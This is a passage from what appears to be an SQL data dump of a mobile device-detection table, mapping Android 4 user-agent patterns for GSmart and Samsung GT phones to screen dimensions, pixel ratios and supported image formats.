Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Roma R2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Roma R2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart T4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart_Classic_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-B5330L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8160) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8160) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190N) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8190N-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200N) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8200Q) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8260) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8260L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8260L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8262) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8262) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8262B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8550L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8550L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8552) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8552B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8552B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8730) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I8730-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9001) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060C) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9060M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9063T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9070) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9070P) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9080L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9080L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9082) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9082) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9082L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9082L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9100T) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9105) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9105P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9105P) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9105P-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9118) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9128V) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9152) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9152) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9152P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9158V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9168I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9190) AppleWebKit/* (KHTML, like Gecko)','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9192) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9192) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9192I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 